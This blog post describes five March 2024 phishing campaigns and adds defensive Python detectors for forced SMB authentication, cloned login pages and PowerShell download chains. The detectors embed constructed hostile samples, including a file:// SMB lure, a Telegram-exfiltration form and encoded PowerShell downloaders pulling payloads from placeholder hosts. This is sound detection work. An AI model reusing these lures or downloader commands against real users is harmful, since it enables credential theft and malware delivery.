Top 5 Evolving Phishing Campaigns In March 2024

March 2024 brought a range of phishing attacks, as criminals keep adopting new tactics and approaches to reach their victims.

Phishing attacks are increasing day by day, so it pays to stay familiar with the current threat landscape. To help with that, we have outlined the five most prominent campaigns of the month in this blog post.

Let's go through each of these attacks in detail.

1. Attack Employing an SMB Server To Capture Victims' Login Information

The month began with an attack carried out by the notorious TA577 threat actor, aimed at victims' credentials. It started with a malicious email in English or German with the subject line "I sent a material to your side last day; did you receive it?" The email carried a ZIP archive containing a malicious HTML file. From there, the attack unfolded as follows:

  • The victim opened the HTML page, which was built from a 450-byte template.
  • The page referenced a file on a third-party server over the SMB protocol, served by impacket-smbserver. Windows attempted to authenticate to that share automatically, without any further user action.
  • From that forced authentication the attackers obtained the victim's IP address, NTLM challenge/response data, username, and computer name.

2. Attack Using Fraudulent MS Outlook Login Pages

Another phishing campaign launched in early March combined a Telegram bot with phishing websites hosted on Cloudflare Workers. The goal was to steal user login credentials. To do so, the attackers automatically replicated the look and feel of the targeted organizations' MS Outlook login pages.

These pages included several elements:

  • Base64-encoded background graphics and design components taken straight from Microsoft.
  • Common JavaScript libraries such as popper.js, jQuery, and Bootstrap, providing a familiar user experience.
  • The victim's corporate logo, retrieved via the Clearbit Logo service.

The attackers sent the victim's login details to a Telegram bot, then redirected the user to the official Microsoft Outlook page.
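
Both campaigns above can be triaged from the HTML alone. The script below is an added example (not ANY.RUN's tooling and not code from the campaigns): it flags an HTML attachment that points the browser at an SMB share, the forced NTLM authentication behind campaign 1, and a page that shows the credential-phishing traits of campaign 2 (Telegram Bot API exfiltration, Clearbit logo lookup, inline base64 images next to a password field). The two HTML samples inside it are constructed, and the IP address, bot id and domain are placeholders.

```python
"""Static triage of an HTML lure: forced-auth SMB references and credential-phishing kit traits.

Added example, not ANY.RUN's tooling or code from the campaigns. The two HTML
samples are constructed; the IP address, Telegram bot id and domain are placeholders.
"""
import base64
import re
from dataclasses import dataclass, field

# Constructed sample: an HTML attachment that sends the browser to an SMB share.
SMB_LURE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=file://203.0.113.10/share/doc.pdf">
</head><body>Loading document...</body></html>"""

# Constructed sample: fragment of a cloned Outlook login page with Telegram exfiltration.
FAKE_LOGIN_HTML = """<html><body style="background:url(data:image/png;base64,iVBORw0KGgo=)">
<img src="https://logo.clearbit.com/example.com">
<form id="login"><input name="loginfmt"><input type="password" name="passwd"></form>
<script>fetch("https://api.telegram.org/bot123456:ABCDEF/sendMessage", {method: "POST"});</script>
</body></html>"""

# file://host/..., smb://host/... or a \\host\share UNC path: any of these makes Windows
# try to authenticate to "host" over SMB, leaking the NTLM challenge/response.
SMB_REF_RE = re.compile(
    r"""(?:file|smb)://([^\s<>"'/\\]+)   # URL form, host is group 1
      | \\\\([^\s<>"'/\\]+)\\            # UNC form, host is group 2
    """,
    re.IGNORECASE | re.VERBOSE,
)
TELEGRAM_BOT_RE = re.compile(r"https?://api\.telegram\.org/bot(\d+):[A-Za-z0-9_-]+")
CLEARBIT_RE = re.compile(r"https?://logo\.clearbit\.com/([A-Za-z0-9.-]+)")
INLINE_IMG_RE = re.compile(r"data:image/[a-z+.-]+;base64,([A-Za-z0-9+/=]+)")
PASSWORD_FIELD_RE = re.compile(r"""<input[^>]*type\s*=\s*["']?password""", re.IGNORECASE)


@dataclass
class TriageResult:
    smb_hosts: list = field(default_factory=list)
    telegram_bots: list = field(default_factory=list)
    clearbit_domains: list = field(default_factory=list)
    inline_images: list = field(default_factory=list)   # formats of images embedded inline
    has_password_field: bool = False

    @property
    def verdicts(self) -> list:
        v = []
        if self.smb_hosts:
            v.append("forced-auth")        # campaign 1 pattern
        if self.has_password_field and (self.telegram_bots or self.clearbit_domains or self.inline_images):
            v.append("credential-phish")   # campaign 2 pattern
        return v


def _image_format(b64: str) -> str:
    """Decode an inline image and identify it by magic bytes (bad base64 -> 'invalid')."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return "invalid"
    if raw.startswith(b"\x89PNG"):
        return "png"
    if raw.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if raw.startswith(b"GIF8"):
        return "gif"
    return "unknown"


def triage_html(html: str) -> TriageResult:
    """Scan raw HTML for the indicators above; no network access, so it is safe on live lures."""
    r = TriageResult()
    for m in SMB_REF_RE.finditer(html):
        r.smb_hosts.append(m.group(1) or m.group(2))
    r.telegram_bots = TELEGRAM_BOT_RE.findall(html)
    r.clearbit_domains = CLEARBIT_RE.findall(html)
    r.inline_images = [_image_format(b) for b in INLINE_IMG_RE.findall(html)]
    r.has_password_field = PASSWORD_FIELD_RE.search(html) is not None
    return r


if __name__ == "__main__":
    for name, sample in (("smb-lure", SMB_LURE_HTML), ("fake-login", FAKE_LOGIN_HTML)):
        print(name, triage_html(sample).verdicts)
```

Run it as a script to see the verdicts for both samples. A file:// or UNC reference inside an email attachment is worth blocking on its own, because Windows will attempt the SMB authentication without any further click from the user; the kit indicators are weaker individually, which is why the second verdict requires a password field plus at least one of them.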

3. Attack Targeting Latin America

One of March's geo-specific campaigns targeted victims in the LATAM region. In one case, the attackers impersonated Colombian government organizations in spam emails carrying PDF attachments. The emails accused the recipients of traffic offenses or other legal troubles. The attack progressed as follows:

  • The user opened the PDF, which led them to download an archive.
  • The archive contained a VBS script.
  • When executed, the script invoked a PowerShell script.
  • The PowerShell script retrieved the final payload from a reputable storage service.

The final payload was one of several remote access trojans (RATs), including AsyncRAT, NjRAT, and Remcos.

4. Attack Leveraging AWS to Deliver STRRAT

This phishing campaign used legitimate services such as AWS and GitHub to host its payloads, and once again relied on social engineering. Victims received emails urging them to confirm payment details by clicking a button. The chain proceeded as follows:

  • Victims clicked the button and received a malicious JAR file masquerading as a payment invoice.
  • Once launched, the file ran a PowerShell command to execute two further JAR files.
  • In the final stage, VCURMS or STRRAT malware was downloaded from GitHub or AWS, compromising the victim's PC.
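
Campaigns 3 and 4 share one detectable step: a Windows script host (the VBS) or the Java runtime (the JAR) spawns PowerShell, which fetches the next stage from a legitimate storage service. The detection below is an added example, not ANY.RUN's or any vendor's rule set. It replays constructed process-creation events (field names mirror Sysmon Event ID 1) and alerts only when both the parent and a download indicator line up, decoding -EncodedCommand first so the URL cannot hide behind base64. The hosts, paths and file names in the sample events are placeholders.

```python
"""Detect the script-host -> PowerShell -> download stage shared by campaigns 3 and 4.

Added example, not ANY.RUN's or any vendor's detection content. The events below
are constructed; field names mirror Sysmon Event ID 1 / Windows 4688 process
creation records. Hosts, paths and file names are placeholders.
"""
import base64
import re

# Parents that should rarely spawn a downloading PowerShell: Windows script hosts
# (the VBS stage of campaign 3) and the Java runtime (the JAR stage of campaign 4).
SCRIPT_PARENTS = {"wscript.exe", "cscript.exe", "java.exe", "javaw.exe", "mshta.exe"}
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
STORAGE_HOST_RE = re.compile(
    r"https?://[^\s\"']*(?:github\.com|githubusercontent\.com|amazonaws\.com|"
    r"drive\.google\.com|dropbox\.com)",
    re.IGNORECASE,
)
ENCODED_CMD_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"')]+")


def decode_encoded_command(cmdline: str) -> str:
    """Replace a -EncodedCommand argument with its decoded UTF-16LE text, if present."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline                      # not actually an encoded command
    return cmdline[: m.start()] + decoded + cmdline[m.end():]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_download_chains(events: list) -> list:
    """One alert per PowerShell process spawned by a script host or Java whose
    (decoded) command line fetches something from the network."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if _basename(e["image"]) not in {"powershell.exe", "pwsh.exe"}:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or _basename(parent["image"]) not in SCRIPT_PARENTS:
            continue
        cmd = decode_encoded_command(e["cmdline"])
        if DOWNLOAD_RE.search(cmd) or STORAGE_HOST_RE.search(cmd):
            alerts.append({
                "pid": e["pid"],
                "parent": _basename(parent["image"]),
                "urls": URL_RE.findall(cmd),
                "encoded": cmd != e["cmdline"],
            })
    return alerts


def _encode(ps: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed
    {"pid": 1, "ppid": 0, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    # campaign 3 shape: the VBS from the PDF lure launches an encoded PowerShell downloader
    {"pid": 2, "ppid": 1, "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\u\\Downloads\\Comparendo.vbs"'},
    {"pid": 3, "ppid": 2, "image": PS, "cmdline": "powershell.exe -nop -w hidden -enc "
     + _encode("IEX (New-Object Net.WebClient).DownloadString('https://example-bucket.s3.amazonaws.com/stage2.ps1')")},
    # campaign 4 shape: the "invoice" JAR uses PowerShell to pull further JARs from GitHub
    {"pid": 4, "ppid": 1, "image": "C:\\Program Files\\Java\\bin\\java.exe",
     "cmdline": 'java.exe -jar "C:\\Users\\u\\Downloads\\Invoice.jar"'},
    {"pid": 5, "ppid": 4, "image": PS, "cmdline": 'powershell -c "Invoke-WebRequest '
     'https://raw.githubusercontent.com/example/repo/main/stage2.jar -OutFile $env:TEMP\\stage2.jar"'},
    # benign: an admin's PowerShell under explorer, and a script host running a local command
    {"pid": 6, "ppid": 1, "image": PS, "cmdline": "powershell.exe -c Get-Date"},
    {"pid": 7, "ppid": 2, "image": PS, "cmdline": "powershell.exe -c Get-Date"},
]

if __name__ == "__main__":
    for a in detect_download_chains(SAMPLE_EVENTS):
        print(a)
```

The two benign events show why the parent check and the download check are ANDed: PowerShell under explorer.exe, or a script host running a local command, stays quiet. In production the same logic maps onto a Sysmon or EDR query keyed on ParentImage and CommandLine, with the base64 decoding done before matching.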

5. Attack Combining TikTok and Google AMP

The last phishing campaign on this list abused several legitimate services to trick users into entering their passwords. It employed a chain of redirects that began with TikTok and ended on Cloudflare.

Here's a thorough account of the attack:

  • A TikTok link carried a Google AMP URL in its "&target=" parameter, so TikTok's redirect sent the browser to Google AMP.
  • Google AMP in turn redirected to a hidden address: a URL shortener service. To disguise the redirection target, that domain name included Unicode characters.
  • The URL shortener sent the victim's browser on to Cloudflare, which hosted the phishing website.
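
Most of this chain can be reconstructed without touching the network, because TikTok and Google AMP encode the next hop in the URL itself. The script below is an added example, not ANY.RUN's code and not material recovered from the campaign: it peels the TikTok target parameter and the Google AMP viewer path, hands the shortener hop to a pluggable `follow` callback (a constructed lookup table here; an HTTP HEAD reading the Location header in real use), and flags hosts that mix Unicode scripts or need punycode. Every URL in it is a constructed placeholder, and the TikTok path and parameter names are illustrative.

```python
"""Unwrap the TikTok -> Google AMP -> shortener -> Cloudflare redirect chain offline.

Added example, not ANY.RUN's code or anything recovered from the campaign. Hops 1
and 2 are decoded from the URLs themselves: TikTok's link-out endpoint carries
the next URL in its `target` parameter and a Google AMP viewer URL
(/amp/s/<host>/<path>) embeds the destination. The shortener hop needs an HTTP
Location header, so the unwrapper takes a `follow` callback; the demo supplies a
constructed lookup table instead of making network calls. Every URL below is a
constructed placeholder; the TikTok path and query names are illustrative.
"""
import unicodedata
from dataclasses import dataclass
from typing import Callable, Optional
from urllib.parse import parse_qs, urlparse


@dataclass
class Hop:
    url: str
    host_ascii: str       # punycode form, i.e. the name the browser actually resolves
    scripts: frozenset    # Unicode scripts used in the host: LATIN, CYRILLIC, ...

    @property
    def homograph(self) -> bool:
        """Host mixes scripts or needs punycode: a likely look-alike domain."""
        return len(self.scripts) > 1 or self.host_ascii != (urlparse(self.url).hostname or "")


def describe(url: str) -> Hop:
    host = urlparse(url).hostname or ""
    try:
        host_ascii = host.encode("idna").decode("ascii")
    except UnicodeError:
        host_ascii = host                  # not IDNA-encodable; keep the raw form
    scripts = frozenset(unicodedata.name(c, "?").split()[0] for c in host if c.isalpha())
    return Hop(url, host_ascii, scripts)


def from_tiktok(url: str) -> Optional[str]:
    """TikTok's redirect endpoint: the real destination sits in ?target=<url-encoded url>."""
    p = urlparse(url)
    if not (p.hostname or "").endswith("tiktok.com"):
        return None
    target = parse_qs(p.query).get("target")
    return target[0] if target else None


def from_google_amp(url: str) -> Optional[str]:
    """Google AMP viewer URL: /amp/s/<host>/<path> stands for https://<host>/<path>
    (/amp/<host>/<path> for plain http)."""
    p = urlparse(url)
    if not (p.hostname or "").endswith("google.com") or not p.path.startswith("/amp/"):
        return None
    rest = p.path[len("/amp/"):]
    scheme = "http"
    if rest.startswith("s/"):
        scheme, rest = "https", rest[2:]
    return f"{scheme}://{rest}" + (f"?{p.query}" if p.query else "")


def unwrap_chain(start: str, follow: Callable[[str], Optional[str]], max_hops: int = 10) -> list:
    """Return the Hops from the lure URL to the landing page. `follow` returns the next
    URL for hops that only an HTTP redirect reveals (or None at the end of the chain)."""
    hops, url = [], start
    while url and len(hops) < max_hops:   # max_hops guards against redirect loops
        hops.append(describe(url))
        url = from_tiktok(url) or from_google_amp(url) or follow(url)
    return hops


# Constructed chain. The shortener host spells "short" with a Cyrillic о (U+043E),
# the kind of Unicode trick the campaign used to disguise the hop.
LURE_URL = ("https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url"
            "&target=https%3A%2F%2Fwww.google.com%2Famp%2Fs%2Fsh%D0%BErt.example%2Fabc123")
CONSTRUCTED_LOCATIONS = {   # stands in for the Location headers a HEAD request would return
    "https://sh\u043ert.example/abc123": "https://secure-login.pages.dev/",   # hypothetical final host
}


def offline_follow(url: str) -> Optional[str]:
    return CONSTRUCTED_LOCATIONS.get(url)


if __name__ == "__main__":
    for h in unwrap_chain(LURE_URL, offline_follow):
        print(f"{h.url}\n    resolves {h.host_ascii}  scripts={sorted(h.scripts)}  homograph={h.homograph}")
```

The homograph check is what exposes the shortener hop: the host renders as a familiar word, but the name the browser actually resolves starts with xn--, and a host that mixes Latin and Cyrillic letters has no honest reason to exist. Swapping `offline_follow` for a function that issues a HEAD request with redirects disabled turns this into a live unwrapper; keep the `max_hops` cap, since attacker-controlled shorteners can loop.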

The page contained a form made up of many encoded code fragments that were gradually decoded and assembled while the browser rendered it. It also blocked right-click interactions, which made inspecting the page elements harder. Once the form was submitted, the attackers received the victim's stolen data via an HTTP POST request.

Analysis Of Phishing Campaigns in ANY.RUN

ANY.RUN is a cloud-based sandbox for advanced malware and phishing analysis. The service offers a fully interactive virtual environment in which you can investigate the threat and interact with the system as it runs.

In the case of phishing, for example, this lets you complete the steps that require human involvement (clicking links, filling in forms) to follow the full attack chain. The sandbox also lets you quickly monitor malicious network traffic and registry activity, trace and inspect processes, extract indicators of compromise, and obtain threat reports.

Did you find this guide interesting? Join our TTB Community on LinkedIn for more exclusive blogs & the latest updates.